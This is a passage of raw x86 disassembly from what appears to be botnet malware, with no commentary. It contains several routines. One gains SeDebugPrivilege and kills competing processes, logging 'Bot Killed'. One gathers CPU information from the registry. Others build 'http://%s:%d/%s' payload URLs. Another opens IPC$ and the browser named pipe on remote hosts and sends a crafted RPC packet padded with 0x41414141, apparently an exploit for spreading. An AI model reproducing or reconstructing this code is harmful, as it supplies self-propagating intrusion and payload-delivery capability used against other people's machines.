add [esp+578h+var_568], 4
sub eax, ecx
add eax, esi
add esi, edi
cmp esi, 30Ch
mov [esp+eax+578h+var_210], bl
jb short loc_41A087
loc_41A0DA: ; CODE XREF: sub_419EA0+4C6�j
push ebx
push 0Fh
mov [esp+580h+var_548], 128h
call ds:dword_426574
lea ecx, [esp+578h+var_548]
push ecx
push eax
mov [esp+580h+var_55C], eax
call ds:dword_426578
test eax, eax
jz loc_41A35B
jmp loc_41A344
; ---------------------------------------------------------------------------
loc_41A108: ; CODE XREF: sub_419EA0+4B5�j
mov edi, ds:dword_41D104
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
mov [esp+584h+var_569], 1
call edi
mov esi, ds:dword_41D038
push eax
call esi
test eax, eax
jnz short loc_41A15C
call ds:dword_41D0F0
cmp eax, 3F0h
jnz short loc_41A158
push 2
call ds:dword_41D030
test eax, eax
jnz short loc_41A147
mov [esp+578h+var_569], bl
loc_41A147: ; CODE XREF: sub_419EA0+2A1�j
lea eax, [esp+578h+var_564]
push eax
push ebx
push 28h
call edi
push eax
call esi
test eax, eax
jnz short loc_41A15C
loc_41A158: ; CODE XREF: sub_419EA0+295�j
mov [esp+578h+var_569], bl
loc_41A15C: ; CODE XREF: sub_419EA0+288�j
; sub_419EA0+2B6�j
push 1
push offset aSedebugprivile ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_419835
add esp, 0Ch
test al, al
jnz short loc_41A181
push [esp+578h+var_564]
call ds:dword_41D0DC
mov [esp+578h+var_569], bl
loc_41A181: ; CODE XREF: sub_419EA0+2D1�j
push [esp+578h+var_540]
push ebx
push 1F0FFFh
call ds:dword_42658C
cmp eax, ebx
mov [esp+578h+var_568], eax
jnz short loc_41A19D
mov [esp+578h+var_569], bl
loc_41A19D: ; CODE XREF: sub_419EA0+2F7�j
mov esi, 104h
push esi
lea eax, [esp+57Ch+var_420]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push esi
lea eax, [esp+57Ch+var_420]
push eax
push ebx
push [esp+584h+var_568]
call ds:dword_426588
mov [esp+578h+var_560], ebx
lea edi, [esp+578h+var_210]
loc_41A1D3: ; CODE XREF: sub_419EA0+352�j
lea eax, [esp+578h+var_420]
push eax
push edi
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41A1F6
inc [esp+578h+var_560]
add edi, esi
cmp [esp+578h+var_560], 3
jb short loc_41A1D3
jmp short loc_41A1FA
; ---------------------------------------------------------------------------
loc_41A1F6: ; CODE XREF: sub_419EA0+345�j
mov [esp+578h+var_569], bl
loc_41A1FA: ; CODE XREF: sub_419EA0+354�j
cmp [esp+578h+var_569], bl
jz loc_41A32A
push ebx
push offset aSedebugprivi_0 ; "SeDebugPrivilege"
push [esp+580h+var_564]
call sub_419835
xor eax, eax
lea edi, [esp+584h+var_558]
stosd
stosd
mov eax, [esp+584h+var_54C]
add esp, 0Ch
cmp [esp+578h+var_540], eax
jz loc_41A32A
lea eax, [esp+578h+var_524]
push offset aSystem ; "System"
push eax
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz loc_41A32A
mov esi, [esp+578h+var_540]
push ebx
push 4
call ds:dword_426574
cmp eax, 0FFFFFFFFh
jz loc_41A32A
push eax
push esi
call sub_4199AC
cmp al, bl
pop ecx
pop ecx
jz loc_41A32A
push [esp+578h+var_540]
lea esi, [esp+57Ch+var_558]
call sub_419A10
test al, al
pop ecx
jz loc_41A30F
push [esp+578h+var_554]
call sub_402648
cmp eax, ebx
pop ecx
jnz short loc_41A293
push ebx
jmp short loc_41A309
; ---------------------------------------------------------------------------
loc_41A293: ; CODE XREF: sub_419EA0+3EE�j
push eax
push [esp+57Ch+var_554]
push [esp+580h+var_558]
push [esp+584h+var_568]
call sub_4198D2
add esp, 10h
cmp al, bl
jz short loc_41A30F
push 100h
call sub_402648
pop ecx
mov esi, eax
lea eax, [esp+578h+var_524]
push eax
lea eax, [esp+57Ch+var_420]
push eax
push [esp+580h+var_568]
call sub_419E55
add esp, 0Ch
test al, al
jz short loc_41A308
push esi
call sub_402A45
pop ecx
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
pop ecx
lea eax, [esp+578h+var_420]
push eax
push offset aBotKilledS ; "Bot Killed: %s"
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 14h
xor ebx, ebx
loc_41A308: ; CODE XREF: sub_419EA0+434�j
push esi
loc_41A309: ; CODE XREF: sub_419EA0+3F1�j
call sub_402B9B
pop ecx
loc_41A30F: ; CODE XREF: sub_419EA0+3DC�j
; sub_419EA0+40A�j
mov esi, [esp+578h+var_540]
push ebx
push 4
call ds:dword_426574
cmp eax, 0FFFFFFFFh
jz short loc_41A32A
push eax
push esi
call sub_419948
pop ecx
pop ecx
loc_41A32A: ; CODE XREF: sub_419EA0+35E�j
; sub_419EA0+386�j ...
push [esp+578h+var_564]
mov esi, ds:dword_41D0DC
call esi
push [esp+578h+var_568]
call esi
push 1
call ds:dword_41D0FC
loc_41A344: ; CODE XREF: sub_419EA0+263�j
lea eax, [esp+578h+var_548]
push eax
push [esp+57Ch+var_55C]
call ds:dword_42657C
test eax, eax
jnz loc_41A108
loc_41A35B: ; CODE XREF: sub_419EA0+25D�j
push 927C0h
call ds:dword_41D0FC
jmp loc_41A0DA
; ---------------------------------------------------------------------------
loc_41A36B: ; CODE XREF: sub_419EA0+14F�j
; sub_419EA0+15B�j ...
call ds:dword_41D0E0
push eax
call sub_414042
pop ecx
mov ecx, [esp+578h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_419EA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=2C4h
sub_41A391 proc near ; CODE XREF: sub_401CC0+E0�p
var_344 = dword ptr -344h
var_340 = dword ptr -340h
var_33C = dword ptr -33Ch
var_335 = byte ptr -335h
var_334 = byte ptr -334h
var_234 = byte ptr -234h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_34 = byte ptr -34h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-2C4h]
sub esp, 344h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+2C4h+var_4], eax
push ebx
push esi
push edi
push 0Bh
pop ecx
mov esi, offset aHardwareDescri ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
lea edi, [ebp+2C4h+var_34]
rep movsd
movsw
mov ebx, 100h
movsb
push ebx
xor esi, esi
lea eax, [ebp+2C4h+var_334]
push esi
push eax
call sub_407B70
push 4
push offset dword_426BE8
push offset aMhz ; "~MHz"
lea eax, [ebp+2C4h+var_34]
push eax
push 4
call sub_416ECD
add esp, 20h
test al, al
jz loc_41A5A9
push ebx
lea eax, [ebp+2C4h+var_334]
push eax
push offset aProcessornames ; "ProcessorNameString"
lea eax, [ebp+2C4h+var_34]
push eax
push 1
call sub_416ECD
add esp, 14h
test al, al
jz loc_41A4E9
mov edi, 0FFh
push edi
lea eax, [ebp+2C4h+var_133]
push esi
push eax
mov [ebp+2C4h+var_335], 0
mov [ebp+2C4h+var_134], 0
call sub_407B70
lea eax, [ebp+2C4h+var_334]
push eax
push offset aS_7 ; "%s"
lea eax, [ebp+2C4h+var_134]
push edi
push eax
call sub_402AEE
lea eax, [ebp+2C4h+var_134]
add esp, 1Ch
lea esi, [eax+1]
loc_41A45C: ; CODE XREF: sub_41A391+D0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A45C
sub eax, esi
push ebx
push 0
mov esi, offset byte_426AE8
push esi
mov [ebp+eax+2C4h+var_134], cl
call sub_407B70
add esp, 0Ch
xor ecx, ecx
mov [ebp+2C4h+var_33C], ecx
loc_41A482: ; CODE XREF: sub_41A391+154�j
cmp [ebp+2C4h+var_335], 0
jnz short loc_41A499
cmp [ebp+ecx+2C4h+var_134], 20h
jz short loc_41A4C9
mov [ebp+2C4h+var_335], 1
dec ecx
jmp short loc_41A4C9
; ---------------------------------------------------------------------------
loc_41A499: ; CODE XREF: sub_41A391+F5�j
movsx eax, [ebp+ecx+2C4h+var_134]
push eax
push esi
push offset aSC_0 ; "%s%c"
push edi
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41A4B7: ; CODE XREF: sub_41A391+12B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41A4B7
sub eax, ecx
mov ecx, [ebp+2C4h+var_33C]
mov ds:byte_426AE8[eax], dl
loc_41A4C9: ; CODE XREF: sub_41A391+FF�j
; sub_41A391+106�j
lea eax, [ebp+2C4h+var_134]
inc ecx
lea edx, [eax+1]
mov [ebp+2C4h+var_33C], ecx
mov [ebp+2C4h+var_344], edx
loc_41A4D9: ; CODE XREF: sub_41A391+14D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41A4D9
sub eax, [ebp+2C4h+var_344]
cmp ecx, eax
jbe short loc_41A482
jmp short loc_41A51C
; ---------------------------------------------------------------------------
loc_41A4E9: ; CODE XREF: sub_41A391+85�j
push ebx
push esi
mov esi, offset byte_426AE8
push esi
call sub_407B70
push offset aUnknown ; "Unknown"
mov edi, 0FFh
push edi
push esi
call sub_402AEE
add esp, 18h
lea eax, [esi+1]
loc_41A50D: ; CODE XREF: sub_41A391+181�j
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41A50D
sub esi, eax
mov ds:byte_426AE8[esi], cl
loc_41A51C: ; CODE XREF: sub_41A391+156�j
and ds:dword_426BEC, 0
mov [ebp+2C4h+var_33C], 1
loc_41A52A: ; CODE XREF: sub_41A391+20D�j
inc ds:dword_426BEC
push ebx
lea eax, [ebp+2C4h+var_234]
push 0
push eax
call sub_407B70
push [ebp+2C4h+var_33C]
lea eax, [ebp+2C4h+var_234]
push offset aHardwareDesc_0 ; "HARDWARE\\DESCRIPTION\\System\\CentralProc"...
push edi
push eax
call sub_402AEE
lea eax, [ebp+2C4h+var_234]
add esp, 1Ch
lea esi, [eax+1]
loc_41A560: ; CODE XREF: sub_41A391+1D4�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A560
sub eax, esi
mov [ebp+eax+2C4h+var_234], cl
lea eax, [ebp+2C4h+var_340]
push eax
push 1
push 0
lea eax, [ebp+2C4h+var_234]
push eax
push 80000002h
call ds:dword_41D02C
test eax, eax
jnz short loc_41A5A0
push [ebp+2C4h+var_340]
call ds:dword_41D010
inc [ebp+2C4h+var_33C]
cmp [ebp+2C4h+var_33C], 8
jb short loc_41A52A
loc_41A5A0: ; CODE XREF: sub_41A391+1FB�j
push [ebp+2C4h+var_340]
call ds:dword_41D010
loc_41A5A9: ; CODE XREF: sub_41A391+62�j
mov ecx, [ebp+2C4h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 2C4h
leave
retn
sub_41A391 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A5C1 proc near ; CODE XREF: sub_41A8D5+B7�p
var_518 = dword ptr -518h
var_508 = dword ptr -508h
var_504 = byte ptr -504h
var_501 = byte ptr -501h
var_390 = byte ptr -390h
var_38D = byte ptr -38Dh
var_21C = byte ptr -21Ch
var_21B = byte ptr -21Bh
var_11C = byte ptr -11Ch
var_11B = byte ptr -11Bh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 508h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov [ebp+var_508], eax
mov eax, ds:dword_41EF64
mov [ebp+var_C], eax
mov eax, ds:dword_41EF68
mov esi, offset dword_41EF6C
lea edi, [ebp+var_504]
mov ebx, 16Fh
movsw
push ebx
mov [ebp+var_8], eax
lea eax, [ebp+var_501]
push 0
push eax
movsb
call sub_407B70
mov esi, offset dword_41EF70
lea edi, [ebp+var_390]
movsw
movsb
push ebx
xor esi, esi
lea eax, [ebp+var_38D]
push esi
push eax
call sub_407B70
xor eax, eax
mov [ebp+var_1C], 0
lea edi, [ebp+var_1B]
stosd
stosd
stosd
stosw
stosb
mov edi, 0FFh
push edi
lea eax, [ebp+var_21B]
push esi
push eax
mov [ebp+var_21C], 0
call sub_407B70
push edi
lea eax, [ebp+var_11B]
push esi
push eax
mov [ebp+var_11C], 0
call sub_407B70
add esp, 30h
cmp [ebp+arg_4], 0
jz short loc_41A6F1
call sub_419347
test al, al
jnz short loc_41A6D9
push ds:dword_4269BC
lea esi, [ebp+var_1C]
call sub_418FC6
lea esi, [ebp+var_21C]
mov ebx, offset byte_425061
mov [esp+518h+var_518], 100h
call sub_4196D1
mov eax, esi
push eax
push ds:dword_426594
lea eax, [ebp+var_1C]
push eax
push offset aHttpSDS ; "http://%s:%d/%s"
lea eax, [ebp+var_11C]
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_11C]
add esp, 1Ch
lea edx, [eax+1]
loc_41A6D0: ; CODE XREF: sub_41A5C1+114�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A6D0
jmp short loc_41A748
; ---------------------------------------------------------------------------
loc_41A6D9: ; CODE XREF: sub_41A5C1+BD�j
push 100h
lea esi, [ebp+var_11C]
mov ebx, offset dword_425580
call sub_4196D1
pop ecx
jmp short loc_41A752
; ---------------------------------------------------------------------------
loc_41A6F1: ; CODE XREF: sub_41A5C1+B4�j
push ds:dword_4269BC
lea esi, [ebp+var_1C]
call sub_418FC6
lea esi, [ebp+var_21C]
mov ebx, offset byte_425061
mov [esp+518h+var_518], 100h
call sub_4196D1
mov eax, esi
push eax
push ds:dword_426594
lea eax, [ebp+var_1C]
push eax
push offset aHttpSDS_0 ; "http://%s:%d/%s"
lea eax, [ebp+var_11C]
push edi
push eax
call sub_402AEE
lea eax, [ebp+var_11C]
add esp, 1Ch
lea edx, [eax+1]
loc_41A741: ; CODE XREF: sub_41A5C1+185�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_41A741
loc_41A748: ; CODE XREF: sub_41A5C1+116�j
sub eax, edx
mov [ebp+eax+var_11C], 0
loc_41A752: ; CODE XREF: sub_41A5C1+12E�j
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_504]
push eax
call sub_41432A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jnz short loc_41A774
loc_41A76D: ; CODE XREF: sub_41A5C1+1EB�j
xor eax, eax
jmp loc_41A8C6
; ---------------------------------------------------------------------------
loc_41A774: ; CODE XREF: sub_41A5C1+1AA�j
lea eax, [ebp+var_C]
push eax
push esi
lea eax, [ebp+var_504]
push eax
push 2
lea ebx, [ebp+var_390]
call sub_41411F
add esp, 10h
test eax, eax
jnz short loc_41A7AE
lea eax, [ebp+var_C]
push eax
push esi
lea eax, [ebp+var_504]
push eax
push 2
call sub_41411F
add esp, 10h
test eax, eax
jz short loc_41A76D
loc_41A7AE: ; CODE XREF: sub_41A5C1+1D1�j
mov ebx, [ebp+var_508]
push 9
pop ecx
xor eax, eax
mov edi, ebx
stosd
push 0FFh
lea eax, [ebx+24h]
push 61h
mov esi, offset dword_4245DC
mov edi, ebx
push eax
rep movsd
call sub_407B70
mov esi, 101h
push esi
lea eax, [ebx+123h]
push 62h
push eax
call sub_407B70
mov eax, 1010101h
lea edi, [ebx+224h]
push esi
stosw
lea eax, [ebx+226h]
push 22h
push eax
call sub_407B70
mov eax, 1010101h
lea edi, [ebx+327h]
stosw
lea edi, [ebx+42Ah]
add esp, 24h
and [ebp+var_8], 0
mov [ebp+var_508], edi
jmp short loc_41A82D
; ---------------------------------------------------------------------------
loc_41A827: ; CODE XREF: sub_41A5C1+29B�j
mov edi, [ebp+var_508]
loc_41A82D: ; CODE XREF: sub_41A5C1+264�j
mov eax, [ebp+var_8]
add eax, 64h
push esi
push eax
lea eax, [edi-101h]
push eax
call sub_407B70
add [ebp+var_508], 103h
add esp, 0Ch
inc [ebp+var_8]
cmp [ebp+var_8], 8
mov eax, 1010101h
stosw
jl short loc_41A827
push 9
pop ecx
mov eax, 6C6C6C6Ch
lea edi, [ebx+0B41h]
rep stosd
stosb
lea edi, [ebx+0B66h]
mov esi, offset dword_424604
movsd
movsd
lea eax, [ebp+var_390]
movsw
mov esi, ds:dword_41D0A4
push eax
call esi
push eax
lea eax, [ebp+var_390]
push eax
lea eax, [ebx+0B70h]
push eax
call sub_407BF0
add esp, 0Ch
push 54Ah
push 6Dh
lea eax, [ebp+var_390]
push eax
call esi
lea eax, [eax+ebx+0B70h]
push eax
call sub_407B70
add esp, 0Ch
mov eax, ebx
loc_41A8C6: ; CODE XREF: sub_41A5C1+1AE�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_41A5C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=12BCh
sub_41A8D5 proc near ; DATA XREF: seg002:004245A8�o
var_133C = byte ptr -133Ch
var_123C = dword ptr -123Ch
var_1238 = dword ptr -1238h
var_1234 = dword ptr -1234h
var_122F = dword ptr -122Fh
var_1228 = word ptr -1228h
var_1226 = word ptr -1226h
var_1224 = dword ptr -1224h
var_1218 = byte ptr -1218h
var_1217 = byte ptr -1217h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-12BCh]
mov eax, 133Ch
call sub_411400
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+12BCh+var_4], eax
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+12BCh+arg_0]
lea edi, [ebp+12BCh+var_133C]
rep movsd
mov esi, 1211h
push esi
lea eax, [ebp+12BCh+var_1217]
push 0
push eax
mov [ebp+12BCh+var_1218], 0
call sub_407B70
mov eax, [ebp+12BCh+var_1238]
add esp, 0Ch
push [ebp+12BCh+var_1234]
mov [ebp+12BCh+var_1228], 2
mov [ebp+12BCh+var_1224], eax
call ds:dword_41D278
push 6
push 1
push 2
mov [ebp+12BCh+var_1226], ax
call ds:dword_41D27C
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41A961
loc_41A95D: ; CODE XREF: sub_41A8D5+A8�j
xor al, al
jmp short loc_41A9C7
; ---------------------------------------------------------------------------
loc_41A961: ; CODE XREF: sub_41A8D5+86�j
push 10h
lea eax, [ebp+12BCh+var_1228]
push eax
push edi
call ds:dword_41D240
cmp eax, 0FFFFFFFFh
jnz short loc_41A97F
loc_41A976: ; CODE XREF: sub_41A8D5+C0�j
push edi
loc_41A977: ; CODE XREF: sub_41A8D5+D7�j
call ds:dword_41D224
jmp short loc_41A95D
; ---------------------------------------------------------------------------
loc_41A97F: ; CODE XREF: sub_41A8D5+9F�j
push [ebp+12BCh+var_122F]
lea eax, [ebp+12BCh+var_1218]
push eax
call sub_41A5C1
test eax, eax
pop ecx
pop ecx
jz short loc_41A976
push 0
push esi
lea eax, [ebp+12BCh+var_1218]
push eax
push edi
call ds:dword_41D228
cmp eax, 0FFFFFFFFh
push edi
jz short loc_41A977
call ds:dword_41D224
mov eax, [ebp+12BCh+var_123C]
imul eax, 2Ch
lea eax, dword_42454C[eax]
inc dword ptr [eax]
mov al, 1
loc_41A9C7: ; CODE XREF: sub_41A8D5+8A�j
mov ecx, [ebp+12BCh+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
add ebp, 12BCh
leave
retn
sub_41A8D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A9DE proc near ; CODE XREF: seg000:00413C39�p
; seg000:00413D4A�p ...
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_28 = dword ptr 30h
arg_2C = dword ptr 34h
arg_30 = dword ptr 38h
arg_34 = dword ptr 3Ch
arg_3C = dword ptr 44h
arg_40 = byte ptr 48h
arg_4C = dword ptr 54h
arg_50 = byte ptr 58h
arg_54 = byte ptr 5Ch
arg_68 = dword ptr 70h
arg_78 = dword ptr 80h
arg_7C = word ptr 84h
arg_80 = dword ptr 88h
arg_84 = word ptr 8Ch
arg_88 = dword ptr 90h
arg_8C = dword ptr 94h
arg_90 = word ptr 98h
arg_94 = byte ptr 9Ch
arg_98 = dword ptr 0A0h
arg_9C = dword ptr 0A4h
arg_A0 = dword ptr 0A8h
arg_A4 = dword ptr 0ACh
arg_A8 = byte ptr 0B0h
arg_AC = word ptr 0B4h
arg_AE = word ptr 0B6h
arg_B0 = dword ptr 0B8h
arg_B4 = word ptr 0BCh
arg_B6 = word ptr 0BEh
arg_B8 = dword ptr 0C0h
arg_BC = dword ptr 0C4h
arg_C0 = word ptr 0C8h
arg_C2 = byte ptr 0CAh
arg_C4 = byte ptr 0CCh
arg_D4 = dword ptr 0DCh
arg_D8 = byte ptr 0E0h
arg_E8 = dword ptr 0F0h
arg_EC = byte ptr 0F4h
arg_1EC = dword ptr 1F4h
arg_1F0 = dword ptr 1F8h
arg_1F8 = dword ptr 200h
arg_1FD = byte ptr 205h
arg_200 = byte ptr 208h
arg_201 = byte ptr 209h
arg_210 = byte ptr 218h
arg_211 = byte ptr 219h
arg_310 = byte ptr 318h
arg_311 = byte ptr 319h
arg_40C = byte ptr 414h
arg_240C = byte ptr 2414h
arg_4410 = byte ptr 4418h
arg_6410 = dword ptr 6418h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
mov eax, 641Ch
call sub_411400
mov eax, ds:dword_423064
xor eax, esp
mov [esp+arg_6410], eax
push ebx
push esi
push edi
push 44h
pop ecx
lea esi, [ebp+arg_0]
lea edi, [esp+0Ch+arg_EC]
rep movsd
mov eax, [esp+0Ch+arg_1F0]
push eax
mov [esp+10h+arg_20], eax
call ds:dword_41D260
xor ebx, ebx
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_4], ebx
loc_41AA2A: ; CODE XREF: sub_41A9DE+722�j
cmp [esp+0Ch+arg_4], 2
ja loc_41B10F
push offset a_ ; "."
push [esp+10h+arg_C]
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jz short loc_41AA9D
push [esp+0Ch+arg_C]
lea eax, [esp+10h+arg_40C]
push offset aSIpc ; "\\\\%s\\ipc$"
push 2000h
push eax
call sub_402AEE
add esp, 10h
push 8
pop ecx
xor eax, eax
push ebx
lea edi, [esp+10h+arg_54]
rep stosd
lea eax, [esp+10h+arg_40C]
push offset byte_41EEEE
mov [esp+14h+arg_68], eax
push offset byte_41EEEF
lea eax, [esp+18h+arg_54]
push eax
call sub_402642
test eax, eax
jnz loc_41B10F
loc_41AA9D: ; CODE XREF: sub_41A9DE+69�j
push [esp+0Ch+arg_C]
lea eax, [esp+10h+arg_240C]
push offset aSPipeBrowser ; "\\\\%s\\pipe\\browser"
push 2000h
push eax
call sub_402AEE
add esp, 10h
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
lea eax, [esp+24h+arg_240C]
push eax
call ds:dword_41D06C
cmp eax, 0FFFFFFFFh
mov [esp+10h], eax
jz loc_41B10F
push 48h
lea eax, [esp+10h+arg_A4]
push ebx
push eax
call sub_407B70
mov byte ptr [esp+18h+arg_A4], 5
mov byte ptr [esp+18h+arg_A4+1], bl
mov byte ptr [esp+18h+arg_A4+2], 0Bh
mov byte ptr [esp+18h+arg_A4+3], 3
mov dword ptr [esp+18h+arg_A8], 10h
mov [esp+18h+arg_AC], 48h
mov [esp+18h+arg_AE], bx
mov [esp+18h+arg_B0], ebx
mov [esp+18h+arg_B4], 10B8h
mov [esp+18h+arg_B6], 10B8h
mov [esp+18h+arg_B8], ebx
mov [esp+18h+arg_BC], 1
mov [esp+18h+arg_C0], bx
mov [esp+18h+arg_C2], 1
mov esi, offset dword_41F02C
lea edi, [esp+18h+arg_C4]
movsd
movsd
movsd
movsd
mov [esp+18h+arg_D4], 3
mov esi, offset dword_41F040
lea edi, [esp+18h+arg_D8]
movsd
movsd
add esp, 0Ch
movsd
push 2
movsd
pop esi
push ebx
lea eax, [esp+10h+arg_50]
push eax
push 48h
lea eax, [esp+18h+arg_A4]
push eax
push dword ptr [esp+20h]
mov [esp+20h+arg_E8], esi
call ds:dword_41D088
test eax, eax
jz loc_41B105
push ebx
lea eax, [esp+0Ch+arg_20]
push eax
push 2000h
lea eax, [esp+14h+arg_4410]
push eax
push [esp+18h+arg_0]
call ds:dword_41D078
call ds:dword_41D108
push eax
call sub_403356
mov edx, 41414141h
mov eax, edx
lea edi, [esp+0Ch+arg_94]
stosd
stosd
stosd
stosd
pop ecx
stosd
push 7
pop ecx
mov eax, edx
lea edi, [esp+8+arg_78]
rep stosd
call sub_403363
mov dword ptr [esp+8+arg_94], eax
xor eax, eax
inc eax
cmp [esp+8+arg_8], eax
mov [esp+8+arg_A0], eax
mov [esp+8+arg_9C], ebx
mov [esp+8+arg_98], eax
mov word ptr [esp+8+arg_A4], bx
jnz short loc_41AC5D
mov dword ptr [esp+8+arg_84], eax
mov dword ptr [esp+8+arg_7C], eax
mov [esp+8+arg_88], ebx
jmp short loc_41AC7C
; ---------------------------------------------------------------------------
loc_41AC5D: ; CODE XREF: sub_41A9DE+266�j
cmp [esp+8+arg_8], ebx
jnz short loc_41AC83
mov dword ptr [esp+8+arg_84], esi
mov dword ptr [esp+8+arg_7C], esi
mov [esp+8+arg_88], 2EBh
loc_41AC7C: ; CODE XREF: sub_41A9DE+27D�j
mov [esp+8+arg_80], ebx
loc_41AC83: ; CODE XREF: sub_41A9DE+283�j
call sub_403363
cdq
mov esi, 0FAh
mov ecx, esi
idiv ecx
inc edx
mov [esp+8+arg_78], edx
call sub_403363
cdq
idiv esi
mov eax, [esp+8+arg_8]
shl eax, 4
mov edi, ds:dword_424628[eax]
push edi
mov dword ptr [esp+0Ch+arg_90], ebx
mov [esp+0Ch+arg_1C], eax
mov [esp+0Ch+arg_18], edi
inc edx
mov [esp+0Ch+arg_8C], edx
call sub_4036E0
mov esi, eax
cmp esi, ebx
pop ecx
mov [esp+8+arg_4], esi
jz loc_41B105
lea eax, [edi-2]
push eax
push 90h
push esi
call sub_407B70
lea edi, [esi+edi-2]
xor eax, eax
stosw
mov eax, [esp+14h+arg_1C]
mov eax, ds:dword_424630[eax]
lea edi, [eax+esi]
mov esi, offset dword_42461C
movsd
movsw
add eax, 7
movsb
mov [esp+14h+arg_14], eax
xor eax, eax
mov [esp+14h+arg_200], bl
lea edi, [esp+14h+arg_201]
stosd
stosd
stosd
stosw
stosb
add esp, 0Ch
mov edi, 0FFh
push edi
lea eax, [esp+0Ch+arg_311]
push ebx
push eax
mov [esp+14h+arg_310], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+0Ch+arg_211]
push ebx
push eax
mov [esp+14h+arg_210], bl
call sub_407B70
add esp, 0Ch
cmp [esp+8+arg_1FD], bl
jz loc_41ADF3
call sub_419347
test al, al
jnz short loc_41ADDA
push ds:dword_4269BC
lea esi, [esp+0Ch+arg_200]
call sub_418FC6
lea esi, [esp+0Ch+arg_310]
mov ebx, offset byte_425061
mov [esp+0Ch+var_C], 100h
call sub_4196D1
pop ecx
mov eax, esi
push eax
push ds:dword_426594
lea eax, [esp+10h+arg_200]
push eax
push offset aHttpSDS_1 ; "http://%s:%d/%s"
lea eax, [esp+18h+arg_210]
push edi
push eax
call sub_402AEE
lea eax, [esp+20h+arg_210]
add esp, 18h
lea ecx, [eax+1]
loc_41ADD1: ; CODE XREF: sub_41A9DE+3F8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41ADD1
jmp short loc_41AE56
; ---------------------------------------------------------------------------
loc_41ADDA: ; CODE XREF: sub_41A9DE+395�j
push 100h
lea esi, [esp+0Ch+arg_210]
mov ebx, offset dword_425580
call sub_4196D1
pop ecx
jmp short loc_41AE60
; ---------------------------------------------------------------------------
loc_41ADF3: ; CODE XREF: sub_41A9DE+388�j
push ds:dword_4269BC
lea esi, [esp+0Ch+arg_200]
call sub_418FC6
lea esi, [esp+0Ch+arg_310]
mov ebx, offset byte_425061
mov [esp+0Ch+var_C], 100h
call sub_4196D1
pop ecx
mov eax, esi
push eax
push ds:dword_426594
lea eax, [esp+10h+arg_200]
push eax
push offset aHttpSDS_2 ; "http://%s:%d/%s"
lea eax, [esp+18h+arg_210]
push edi
push eax
call sub_402AEE
lea eax, [esp+20h+arg_210]
add esp, 18h
lea ecx, [eax+1]
loc_41AE4F: ; CODE XREF: sub_41A9DE+476�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41AE4F
loc_41AE56: ; CODE XREF: sub_41A9DE+3FA�j
sub eax, ecx
mov [esp+eax+8+arg_210], 0
loc_41AE60: ; CODE XREF: sub_41A9DE+413�j
lea eax, [esp+8+arg_210]
push eax
mov esi, offset dword_433950
push esi
call sub_41432A
test eax, eax
pop ecx
pop ecx
mov [esp+8+arg_C], eax
jz loc_41B126
mov edi, offset dword_424614
push edi
push eax
push esi
push 1
mov ebx, offset dword_433AC8
call sub_41411F
add esp, 10h
test eax, eax
jnz short loc_41AEB4
push edi
push [esp+0Ch+arg_C]
push esi
push 2
call sub_41411F
add esp, 10h
test eax, eax
jz loc_41B126
loc_41AEB4: ; CODE XREF: sub_41A9DE+4BC�j
mov esi, [esp+8+arg_4]
dec eax
push eax
mov eax, [esp+0Ch+arg_14]
add eax, esi
push ebx
push eax
call sub_407BF0
mov eax, [esp+14h+arg_1C]
mov eax, ds:dword_42462C[eax]
add esp, 0Ch
cmp [esp+8+arg_8], 1
jnz short loc_41AF07
mov ecx, ds:dword_433C68
